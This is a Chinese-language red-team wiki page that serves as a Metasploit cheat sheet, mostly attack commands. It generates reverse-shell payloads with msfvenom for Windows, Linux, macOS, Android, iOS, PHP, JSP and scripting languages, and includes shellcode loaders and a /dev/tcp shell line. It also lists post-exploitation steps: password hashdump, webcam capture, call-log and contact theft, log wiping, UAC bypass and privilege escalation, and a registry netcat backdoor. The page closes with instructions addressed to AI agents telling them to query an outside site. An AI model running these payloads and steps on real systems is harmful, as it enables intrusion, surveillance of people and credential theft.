# Metasploit

{% embed url="<https://github.com/rapid7/metasploit-framework>" %}

{% embed url="<https://github.com/rapid7/metasploit-payloads>" %}

Metasploit 是一款开源的安全漏洞检测工具，可以帮助安全和IT专业人士识别安全性问题，验证漏洞的缓解措施，同时该工具也是渗透测试环境中的利器，它支持多平台Payload的生成具有完全的跨平台性，本次实验将学会生成各种攻击载荷。

**快速安装Metasploit** linux系统下只需要执行下面的三条命令既可以自动安装,不过国内网速你懂的.

```
curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb \
> msfinstall && chmod 755 msfinstall && ./msfinstall
```

## **关于Msfvenom命令常用参数解释**

```
[root@localhost ~]# msfvenom --help

      -p, --payload    <payload>       指定需要使用的payload(攻击荷载)
      -l, --list       [module_type]   列出指定模块的所有可用资源.
      -n, --nopsled    <length>        为payload预先指定一个NOP滑动长度
      -f, --format     <format>        指定输出格式
      -e, --encoder    [encoder]       指定需要使用的encoder编码器
      -a, --arch       <architecture>  指定payload的目标架构
          --platform   <platform>      指定payload的目标平台
      -s, --space      <length>        设定有效攻击荷载的最大长度
      -b, --bad-chars  <list>          设定规避字符集
      -i, --iterations <count>         指定payload的编码次数
          --shellest                   最小化生成payload
```

**Windows ShellCode**

```
[root@localhost ~]# msfvenom -a x86 --platform Windows -p windows/meterpreter/reverse_tcp \
-b '\x00\x0b' lhost=192.168.1.20 lport=9999 -f c

[root@localhost ~]# msfvenom -a x64 --platform Windows -p windows/x64/meterpreter/reverse_tcp \
-b '\x00\x0b' lhost=192.168.1.20 lport=9999 -f c
```

**Windows EXE Or DLL**

```
[root@localhost ~]# msfvenom -a x86 --platform Windows -p windows/meterpreter/reverse_tcp \
lhost=192.168.1.20 lport=9999 -e x86/shikata_ga_nai -i 3 -b '\x00\x0a\xff' -f exe -o payload.exe

[root@localhost ~]# msfvenom -p windows/meterpreter/reverse_tcp -b'\x0\x0b' \
lhost=192.168.1.20 lport=9999 -f dll > payload.dll
```

**Linux ShellCode**

```
[root@localhost ~]# msfvenom -a x86 --platform Linux -p linux/x86/meterpreter/reverse_tcp \
lhost=192.168.1.20 lport=9999 -f c

[root@localhost ~]# msfvenom -a x64 --platform Linux -p linux/x64/meterpreter/reverse_tcp \
lhost=192.168.1.20 lport=9999 -f c
```

**Linux ELF Or ELF-SO**

```
[root@localhost ~]# msfvenom -a x86 --platform Linux -p linux/x86/meterpreter/reverse_tcp -b'\x00\x0b' \
lhost=192.168.1.20 lport=9999 -f elf -o payload.elf

[root@localhost ~]# msfvenom -a x64 --platform Linux -p linux/x64/meterpreter/reverse_tcp -b'\x00\x0b' \
lhost=192.168.1.20 lport=9999 -f elf -o payload.elf

[root@localhost ~]# msfvenom -a x64 --platform Linux -p linux/x64/meterpreter/reverse_tcp -b'\x00\x0b' \
lhost=192.168.1.20 lport=9999 -f elf-so -o payload.so
```

**Mac OS X ShellCode**

```
[root@localhost ~]# msfvenom -a x86 --platform osx -p osx/x86/shell_reverse_tcp \
-b '\x0\x0b' lhhost=192.168.1.20 lport=9999 -f c

[root@localhost ~]# msfvenom -a x64 --platform osx -p osx/x64/shell_reverse_tcp \
-b '\x0\x0b' lhhost=192.168.1.20 lport=9999 -f c
```

**Mac OS X Macho**

```
[root@localhost ~]# msfvenom -a x86 --platform osx -p osx/x86/shell_reverse_tcp -b '\x00\0b' \
lhost=192.168.1.20 lport=9999 -f macho -o payload.macho

[root@localhost ~]# msfvenom -a x64 --platform osx -p osx/x64/shell_reverse_tcp -b '\x00\0b' \
lhost=192.168.1.20 lport=9999 -f macho -o payload.macho
```

**Android Or Iphone App**

```
[root@localhost ~]# msfvenom --platform android -p android/meterpreter/reverse_tcp \
lhost=192.168.1.20 lport=9999 -o payload.apk

[root@localhost ~]# msfvenom --platform apple_ios -p apple_ios/aarch64/meterpreter_reverse_tcp \
lhost=192.168.1.20 lport=9999 -o payload.ios
```

**PHP Or ASP Or JSP**

```
[root@localhost ~]# msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.1.20 lport=9999 -f raw > shell.php

[root@localhost ~]# msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp \
lhost=192.168.1.20 lport=9999 -f aspx -o payload.aspx

[root@localhost ~]# msfvenom --platform java -p java/jsp_shell_reverse_tcp \
lhost=192.168.1.20 lport=9999 -f raw -o payload.jsp

[root@localhost ~]# msfvenom -p java/jsp_shell_reverse_tcp \
lhost=192.168.1.20 lport=9999 -f raw -o payload.war
```

**BASH Or PowerShell**

```
[root@localhost ~]# msfvenom -p cmd/unix/reverse_bash LHOST=192.168.1.20 LPORT=9999 > -f raw > payload.sh
[root@localhost ~]# exec 5<>/dev/tcp/192.168.1.20/9999

[root@localhost ~]# msfvenom -a x86 --platform Windows -p windows/meterpreter/reverse_tcp \
-b '\x00\x0b' LHOST=192.168.1.20 lport=9999 -f psh-cmd > payload.ps1
```

**Python Or Ruby Or NodeJS**

```
[root@localhost ~]# msfvenom -p python/meterpreter/reverse_tcp \
lhost=192.168.1.20 lport=9999 -f raw -o payload.py

[root@localhost ~]# msfvenom -p ruby/shell_reverse_tcp \
LHOST=192.168.1.20 LPORT=9999 -f raw -o payload.rb

[root@localhost ~]# msfvenom -p cmd/unix/reverse_lua \
LHOST=192.168.1.20 LPORT=9999 -f raw -o payload.lua

[root@localhost ~]# msfvenom -p nodejs/shell_reverse_tcp \
LHOST=192.168.1.20 LPORT=9999 -f raw -o payload.js

[root@localhost ~]# msfvenom -p cmd/unix/reverse_perl \
LHOST=192.168.1.20 LPORT=9999 -f raw -o payload.pl
```

**服务端配置后门回弹会话(通用)**

```
msf5 > use exploit/multi/handler
msf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > set lhost 192.168.1.20
msf5 exploit(multi/handler) > set lport 9999
msf5 exploit(multi/handler) > exploit -j -z
```

**Windows: 附上ShellCode有效性测试框架**

```
#include <Windows.h>
#include <stdio.h>
#pragma comment(linker, "/section:.data,RWE")

unsigned char buf[] = "";

typedef void(__stdcall *CODE) ();
int main()
{
    //((void(*)(void))&buf)();
    PVOID pFunction = NULL;
    pFunction = VirtualAlloc(0, sizeof(buf), MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
    memcpy(pFunction, buf, sizeof(buf));
    CODE StartShell = (CODE)pFunction;
    StartShell();
}
```

**Linux: 附上ShellCode有效性测试框架**

```
#include <stdlib.h>
const unsigned char shellcode[] = "\x48\x31\xff\x6a\x09\x58\x99\xb6\x10\x48\x89\xd6\x4d\x31\xc9";

int main(int argc, char **argv) {
    int (*ret)();
    ret = (int(*)())shellcode;
    (int)(*ret)();
    exit(0);
}

#include <stdio.h>
#include <string.h>
 
char *shellcode = "\x48\x31\xff\x6a\x09\x58\x99\xb6\x10\x48\x89\xd6\x4d\x31\xc9";
 
int main(void)
{
    fprintf(stdout,"Length: %d\n",strlen(shellcode));
    (*(void(*)()) shellcode)();
    return 0;
}
```

**后渗透基础命令**

```
msf5 exploit(multi/handler) > sessions          # 查询当前会话
msf5 exploit(multi/handler) > sessions -i 1     # 通过ID号进入指定会话
msf5 exploit(multi/handler) > sessions -k 1     # 通过ID号杀死一个会话
msf5 exploit(multi/handler) > background        # 将会话放入后台
msf5 exploit(multi/handler) > getuid/getpid     # 查询用户权限与PID
msf5 exploit(multi/handler) > sysinfo           # 查看目标系统信息
msf5 exploit(multi/handler) > ps                # 查目标主机进程
msf5 exploit(multi/handler) > kill PID          # 杀死目标制定进程
msf5 exploit(multi/handler) > getsystem         # 尝试令牌提权
msf5 exploit(multi/handler) > shell             # 进入目标shell环境

msf5 exploit(multi/handler) > enumdesktops   # 查看可用的桌面
msf5 exploit(multi/handler) > getdesktop     # 获取当前meterpreter关联的桌面
msf5 exploit(multi/handler) > set_desktop    # 设置meterpreter关联的桌面
msf5 exploit(multi/handler) > screenshot     # 截屏
msf5 exploit(multi/handler) > run vnc        # 使用vnc远程桌面连接

msf5 exploit(multi/handler) > uictl disable mouse    # 禁用目标鼠标
msf5 exploit(multi/handler) > uictl enable keyboard  # 开启目标键盘

msf5 exploit(multi/handler) > webcam_list       # 查看目标主机摄像头
msf5 exploit(multi/handler) > webcam_snap       # 摄像头拍裸照
msf5 exploit(multi/handler) > webcam_stream     # 开启目标主机摄像头
msf5 exploit(multi/handler) > clearav           # 销毁日志文件

msf5 exploit(multi/handler) > webcam_stream -i 1/2       #打开前置或后置摄像头
msf5 exploit(multi/handler) > check_root                 #检测root
msf5 exploit(multi/handler) > dump_calllog               #下载电话记录
msf5 exploit(multi/handler) > dump_contacts              #下载信息记录
msf5 exploit(multi/handler) > geolocate                  #定位，需要下载谷歌地图
```

**Migrate进程迁移**

```
msf5 exploit(multi/handler) > execute                  # 在目标机器中执行文件
msf5 exploit(multi/handler) > execute -H -i -f cmd.exe # 创建新进程cmd.exe -H不可见-i交互

msf5 exploit(multi/handler) > getpid
msf5 exploit(multi/handler) > ps
msf5 exploit(multi/handler) > migrate PID   # 通过PID号迁移进程
```

**文件查阅与远程传输**

```
msf5 exploit(multi/handler) > getwd                                # 查看当前工作目录
msf5 exploit(multi/handler) > search -f *filename*                 # 搜索文件
msf5 exploit(multi/handler) > cat c:\\lyshark.log                  # 查看文件内容
msf5 exploit(multi/handler) > upload /tmp/shell.exe C:\\shell.exe  # 上传文件到目标机
msf5 exploit(multi/handler) > download c:\\shell.exe /tmp/         # 下载文件到本机上
msf5 exploit(multi/handler) > edit c:\\lyshark.log                 # VIM编辑或创建文件
msf5 exploit(multi/handler) > rm C:\\lyshark.log                   # 删除文件
msf5 exploit(multi/handler) > getlwd                               # 看肉鸡当前目录
msf5 exploit(multi/handler) > lcd /tmp                             # 切换目录
```

**网络与端口转发/端口扫描**

```
msf5 exploit(multi/handler) > ifconfig        # 查询肉鸡IP地址
msf5 exploit(multi/handler) > netstat -antp   # 查询目标网络连接
msf5 exploit(multi/handler) > arp -a          # 查询目标ARP缓存
msf5 exploit(multi/handler) > getproxy        # 查看目标代理信息
msf5 exploit(multi/handler) > route           # 查看目标路由表
run post/windows/gather/arp_scanner RHOSTS=192.168.1.0/24          # 扫描192.168.1.0/24网段
run auxiliary/scanner/portscan/tcp RHOSTS=192.168.1.100 PORTS=3389 # 检测是否开启3389端口

#-----------------------------------------------------------------------
# portfwd 端口转发与端口关闭
portfwd add -l 9999 -p 3389 -r 127.0.0.1   # 将目标机3389端口转发到本地9999
portfwd list                               # 查询当前转发列表
portfwd delete -l 9999                     # 删除本地主机的9999端口映射

#-----------------------------------------------------------------------
# autoroute 添加与删除主机路由
run autoroute -p                              # 查询添加的路由记录
run autoroute -s 10.10.10.1 -n 255.255.255.0  # 在目标主机添加一条路由
run autoroute -d -s 10.10.10.1                # 删除目标主机中的路由
run autoroute -s 10.10.10.1/24                # 添加一个路由网段
```

**后渗透信息搜集模块**

```
#-----------------------------------------------------------------------
# Centos系统中这些模块默认保存在以下目录中
[root@localhost post]# cd /opt/metasploit-framework/embedded/framework/modules/post/
[root@localhost post]# ls
aix  android  apple_ios  brocade  cisco  firefox  hardware  juniper  linux  multi  osx  solaris  windows

# 以Windows系统中的搜集模块为例,其默认存储在以下路径下.
[root@localhost gather]# pwd
/opt/metasploit-framework/embedded/framework/modules/post/windows/gather

#-----------------------------------------------------------------------
# 信息搜集模块众多,这里拿几个常用模块备注

meterpreter > info post/windows/gather/enum_files           # 查询模块配置参数
meterpreter > run post/windows/gather/enum_files            # 枚举目标服务
meterpreter > run post/windows/gather/enum_services         # 枚举目标服务
meterpreter > run post/windows/gather/hashdump              # 盗取Hash
meterpreter > run post/windows/gather/checkvm               # 是否虚拟机
meterpreter > run post/windows/gather/forensics/enum_drives # 查看分区
meterpreter > run post/windows/gather/enum_applications     # 获取安装软件信息
meterpreter > run post/windows/gather/dumplinks             # 获取最近的文件操作
meterpreter > run post/windows/gather/enum_ie               # 获取IE缓存
meterpreter > run post/windows/gather/enum_chrome           # 获取Chrome缓存
meterpreter > run post/windows/gather/enum_patches          # 补丁信息
meterpreter > run post/windows/gather/enum_domain           # 查找域控
```

**针对肉鸡的提权操作**

```
#-----------------------------------------------------------------------
# 使用bypassuac脚本尝试提权
meterpreter > background
msf > use exploit/windows/local/bypassuac
msf > set SESSION 1
msf > run

#-----------------------------------------------------------------------
meterpreter > run post/windows/gather/enum_patches      # 收集目标主机补丁情况
[+] KB2871997 is missing
[+] KB2928120 is missing
[+] KB977165 - Possibly vulnerable to MS10-015 kitrap0d if Windows 2K SP4 - Windows 7
meterpreter > background
msf > use exploit/windows/local/ms13_053_schlamperei    # 寻找相符合的提权脚本,执行测试
msf > set SESSION 1
msf > exploit
```

**添加系统用户与开启3389远程**

```
#-----------------------------------------------------------------------
# 添加系统用户与开启远程桌面
meterpreter > run getgui -e                                                     # 开启远程桌面
meterpreter > run getgui -u lyshark -p 123123                                   # 添加用户
meterpreter > run getgui -f 9999 -e                                             # 3389端口转发到9999
meterpreter > run post/windows/manage/enable_rdp                                # 开启远程桌面
meterpreter > run post/windows/manage/enable_rdp USERNAME=lyshark PASSWORD=123  # 添加用户
meterpreter > run post/windows/manage/enable_rdp FORWARD=true LPORT=9999        # 将3389端口转发到9999
```

**注册表操作与写入后门**

```
-d   注册表中值的数据.    -k   注册表键路径    -v   注册表键名称
enumkey 枚举可获得的键    setval 设置键值    queryval 查询键值数据
#-----------------------------------------------------------------------
upload /root/nc.exe C:\\windows\\                                       # 上传nc工具到根目录
reg enumkey -k HKLM\\software\\microsoft\\windows\\currentversion\\run  # 枚举run下的key
reg setval -k HKLM\\software\\microsoft\\windows\\currentversion\\run -v myshell -d 'C:\windows\nc.exe -Ldp 666 -e cmd.exe' # 加后门
reg queryval -k HKLM\\software\\microsoft\\windows\\currentversion\\Run -v myshell    # 查看键值

[root@localhost ~]# nc -v 192.168.1.20 666   # 攻击者连接后门
```

**目标网卡抓包**

```
msf > use sniffer
msf > sniffer_interfaces     # 查看网卡
msf > sniffer_start 1        # 选择网卡开始抓包
msf > sniffer_stats 1        # 查看状态
msf > sniffer_dump 1 /tmp/ltest.pcap  #导出pcap数据包
msf > sniffer_stop 1         # 停止抓包
```


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://wiki.iredteam.cn/post-infiltration-attack-phase/tools/foreign-tool/metasploit.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.